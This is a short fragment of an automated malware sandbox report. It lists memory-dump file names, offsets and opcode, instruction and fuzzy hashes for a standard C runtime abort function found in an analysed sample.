        • _abort.LIBCMT ref: 01236A40
        Memory Dump Source
        • Source File: 00000000.00000002.1002474836.0000000001231000.00000040.00020000.sdmp, Offset: 01230000, based on PE: true
        • Associated: 00000000.00000002.1002466607.0000000001230000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002492548.0000000001249000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002502352.000000000124D000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002507213.000000000124E000.00000080.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002512222.0000000001250000.00000004.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1230000_WVbU1Gf5p8.jbxd
        Similarity
        • API ID: ErrorLast$_abort
        • String ID:
        • API String ID: 88804580-0
        • Opcode ID: aa58509f6efdb3222c8017ae886c3c40867ab82a5efb5d164352100fd6f0ea10
        • Instruction ID: 8789ee82cafe7edee77d89222efde8a5dac331ebf948659f9c3bb583765978f2
        • Opcode Fuzzy Hash: aa58509f6efdb3222c8017ae886c3c40867ab82a5efb5d164352100fd6f0ea10
        • Instruction Fuzzy Hash: BEF0A9FA574603B7DB22737A7C09A7A255FCFE5625B254024F71492185EE61C6428270
        Uniqueness

        Uniqueness Score: -1.00%